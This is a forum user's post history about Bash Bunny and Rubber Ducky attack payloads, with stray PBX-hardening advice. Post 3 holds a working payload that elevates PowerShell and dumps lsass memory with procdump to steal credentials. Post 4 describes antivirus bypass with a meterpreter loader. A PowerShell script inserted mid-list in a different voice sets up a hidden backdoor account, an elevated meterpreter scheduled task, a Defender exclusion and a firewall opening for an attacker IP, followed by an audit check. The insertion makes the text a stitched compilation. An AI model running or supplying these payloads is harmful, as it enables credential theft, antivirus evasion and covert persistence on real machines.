rottingsun's Achievements

  1. There are a few basic strategies, some hardware-based and some software-based. Normally a special type of firewall called a session border controller is placed in front of the PBX. They're designed to address issues like toll fraud. Other things can be done too, though. General PBX hardening best practices should be enforced, like strong SIP account passwords, limiting SIP sessions to only your authorized private subnets, not allowing outgoing international calling, not allowing outgoing calling to offshore US territories, turning off call transfer feature codes for incoming calls, not exposing your PBX directly to a public IP, etc. On top of that, you must monitor logs regularly. Here's a presentation that's FreePBX-based but includes general best practices. https://player.vimeo.com/video/130328541
  2. With mimikatz and all its derivatives being flagged more and more these days, I find it more effective to take a memory dump of lsass using procdump and then run it through mimi in minidump mode.
  3. Here's my working code for running an executable (procdump) from the bunny within powershell and then saving the dump file to the bunny, given the user has local admin privs to begin with. Note that in the line that runs procdump, the & character occurs at the front of the command. It is a special powershell operator that evaluates the text following the & character as a command and not a powershell object.

    LED Y 100
    source bunny_helpers.sh
    # the loot folder must exist before the host mounts the udisk, or procdump cannot write the dump
    mkdir -p /root/udisk/loot/takeadump
    LED B 100
    ATTACKMODE HID STORAGE
    # open the Run dialog and launch an elevated powershell, accepting the UAC prompt with Alt+Y
    Q GUI r
    Q DELAY 500
    Q STRING powershell Start-Process powershell -Verb runAs
    Q ENTER
    Q DELAY 1000
    Q ALT y
    Q DELAY 500
    # find the bunny's drive letter by its volume label
    Q STRING \$bunny\=\(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
    Q DELAY 500
    Q ENTER
    Q DELAY 500
    # & is the call operator; without it powershell would try to evaluate the path as an expression
    Q STRING \& \$bunny\\payloads\\$SWITCH_POSITION\\Procdump\\procdump.exe -accepteula -ma lsass.exe \$bunny\\loot\\takeadump\\lsd.dmp
    Q ENTER
    Q DELAY 200
    # eject the bunny cleanly so the dump is flushed to disk
    Q STRING \$driveEject\=New-Object -comObject Shell.Application
    Q ENTER
    Q DELAY 200
    Q STRING \$driveEject.Namespace\(17\).ParseName\(\$bunny\).InvokeVerb\(\"Eject\"\)
    Q ENTER
    Q DELAY 200
    Q STRING exit
    Q ENTER
    LED FINISH
  4. A technique I've been experimenting with that gets past both Win Defender and Vipre AV currently is a custom shellcode loader, as per http://www.attactics.org/2016/03/bypassing-antivirus-with-10-lines-of.html. I've used the loader almost verbatim with a shikata_na_gai meterpreter rev_tcp payload to successfully bypass both.
  5. The latest Empire stagers actually have a bunny target.
  6. Very nice. I actually never thought of the bunny/ducky in the context of legitimate uses. I got a bunny personally so I can demo to management what happens if I grant a non-IT user local admin perms like I sometimes get asked.
  7. I believe RDP locks the session of the currently logged in user, which would be a dead giveaway. Would this payload be more in the context of a sneak attack while a user is away? Not knocking it, just wondering the intent.
  8. KeePass is really awesome. Just make sure an attacker using Empire doesn't get a shell on your system. It includes a module called KeeThief which can display your master password in cleartext.
  9. I ordered a bunny late last night. Looking forward to trying out this payload and maybe adding in the concepts I mentioned.
  10. I would but I don't wanna be hungover for work tomorrow.
  11. Right, but this payload actually does assume that the machine being attacked is already logged in with admin rights, as per the description: "#OS: Windows (Requires Powershell and Admin Rights)". This would be a great payload for the case of a target running, say, Windows 10 Home as the default user that also happens to be part of the Local Admins group. It's safe to assume that probably a lot of home users run Windows like that. On the other hand, this payload should NEVER work in a corporate/AD environment if even the most basic security practices are being followed. I am sure we'd all be shocked, though, at the number of AD setups where every user is a local admin, and god forbid, a domain admin.
  12. Anything can be done with a little ingenuity and local admin privs, which this payload does assume that the logged in user has. I have several ideas that could enhance this already good payload, including:
     - The one I previously posted about. That is, making the new user invisible to the Windows logon screen.
     - Creating an elevated scheduled task (Run with Highest Privileges option) with the new user creds. The task executes a meterpreter payload to connect back to the attacking machine after 1 minute, 5 minutes, whatever. The meterpreter session created from the scheduled task returns with UAC already bypassed, allowing for a simple getsystem command to elevate within meterpreter. EDIT: Actually it looks like the meterpreter shell already does this the way it's implemented here.
     - Using Set-MpPreference to disable Windows Defender, although this is a bit "noisy" since it displays a tray popup. An alternative would be to use Set-MpPreference to set a folder exception for Windows Defender before copying any binaries that might otherwise be flagged from the bunny to the exception folder.
     - Use powershell to add a Windows Firewall exception to allow all incoming traffic from your attacking IP.
     The possibilities are endless. I guess I just need to break down and order a bunny.
  13. Very nice payload. It'd be sweet to go even a step further and hide the new user from the Windows login screen with reg commands, as per the technique outlined in this post: http://www.windowscentral.com/how-hide-specific-user-accounts-sign-screen-windows-10
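The four enhancements listed in posts 12 and 13 above (hiding the new account from the sign-in screen, an elevated scheduled task, a Defender exclusion folder instead of switching Defender off, and an inbound firewall allow scoped to one IP), as one PowerShell script, followed by the audit a defender would run to find each of those artefacts again. This is an added example, not the payload's code or rottingsun's; the account name, password, task name, staging folder, executable name and attacker IP are placeholders chosen for the example, and the account is assumed to already exist because the payload being discussed creates it.

```powershell
#Requires -RunAsAdministrator
# Added example, not from the payload under discussion. Every value below is a
# placeholder for this example; 192.0.2.10 is from the documentation address range.
$UserName   = 'svc_backup'                    # assumed: account created earlier by the payload
$Password   = 'ChangeMe-Example-1'            # assumed: that account's password
$TaskName   = 'UpdateCheck'                   # assumed task name
$AttackerIP = '192.0.2.10'                    # assumed attacking host
$StageDir   = 'C:\ProgramData\stage'          # assumed folder for binaries copied off the bunny
$Callback   = Join-Path $StageDir 'met.exe'   # assumed name of the copied meterpreter exe

$UserListKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'

# Post 13: a DWORD named after the account, set to 0, under SpecialAccounts\UserList
# removes it from the sign-in screen. The account still exists and still logs on.
function Hide-AccountFromLogonScreen {
    param([Parameter(Mandatory)][string]$Name)
    New-Item -Path $UserListKey -Force | Out-Null
    New-ItemProperty -Path $UserListKey -Name $Name -Value 0 -PropertyType DWord -Force | Out-Null
}

# Post 12, item 2: -RunLevel Highest gives the task the account's full admin token,
# so the process it starts is not behind the UAC split token.
function Register-ElevatedCallback {
    param([string]$Name, [string]$Exe, [int]$DelayMinutes, [string]$User, [string]$Pass)
    $action  = New-ScheduledTaskAction -Execute $Exe
    $trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes($DelayMinutes)
    Register-ScheduledTask -TaskName $Name -Action $action -Trigger $trigger `
        -User $User -Password $Pass -RunLevel Highest | Out-Null
}

# Post 12, item 3: an exclusion folder rather than turning Defender off (no tray popup).
# Add-MpPreference appends to the exclusion list; Set-MpPreference -ExclusionPath replaces it.
function Add-DefenderExclusionFolder {
    param([string]$Path)
    New-Item -ItemType Directory -Path $Path -Force | Out-Null
    Add-MpPreference -ExclusionPath $Path
}

# Post 12, item 4: allow all inbound traffic, but only from the attacking IP.
function Add-InboundAllowFromHost {
    param([string]$RemoteIP)
    New-NetFirewallRule -DisplayName 'Remote Management' -Direction Inbound `
        -RemoteAddress $RemoteIP -Action Allow -Profile Any | Out-Null
}

# The check: each change above leaves an artefact a local admin can enumerate.
function Find-PersistenceArtifacts {
    $key    = Get-Item -Path $UserListKey -ErrorAction SilentlyContinue
    $hidden = if ($key) { $key.Property | Where-Object { $key.GetValue($_) -eq 0 } }

    # Vendor tasks live in subfolders; hand-registered ones usually sit at the root path.
    $tasks = Get-ScheduledTask | Where-Object {
        $_.TaskPath -eq '\' -and $_.Principal.RunLevel -eq 'Highest' -and $_.Principal.UserId
    } | Select-Object TaskName, @{ n = 'RunAs'; e = { $_.Principal.UserId } }

    # Inbound allow rules scoped to specific remote addresses rather than Any.
    $rules = Get-NetFirewallRule -Direction Inbound -Action Allow -Enabled True |
        Where-Object { ($_ | Get-NetFirewallAddressFilter).RemoteAddress -ne 'Any' } |
        Select-Object DisplayName, @{ n = 'Remote'; e = { ($_ | Get-NetFirewallAddressFilter).RemoteAddress } }

    [pscustomobject]@{
        HiddenAccounts     = @($hidden)
        RootElevatedTasks  = @($tasks)
        ScopedInboundAllow = @($rules)
        DefenderExclusions = @((Get-MpPreference).ExclusionPath)
    }
}

# Apply the enhancements, then show what the audit finds afterwards.
Hide-AccountFromLogonScreen -Name $UserName
Add-DefenderExclusionFolder -Path $StageDir
Add-InboundAllowFromHost -RemoteIP $AttackerIP
Register-ElevatedCallback -Name $TaskName -Exe $Callback -DelayMinutes 5 -User $UserName -Pass $Password
Find-PersistenceArtifacts | Format-List
```

The audit half is the part worth keeping on a defended host: none of these changes needs malware to be running, so endpoint tooling that only looks at processes misses all four, while a registry value under SpecialAccounts\UserList, a new exclusion path, a root-level task running as Highest, and an inbound allow rule pinned to one address are each a one-line query.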
  14. Here is what I always used for enumerating the duck by the label DUCKY:

    for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duckydrive=%d

    Then the ducky can actually be referenced by letter with the env var %duckydrive%.
  15. This. If your company can afford one, you will be blown away vs all others.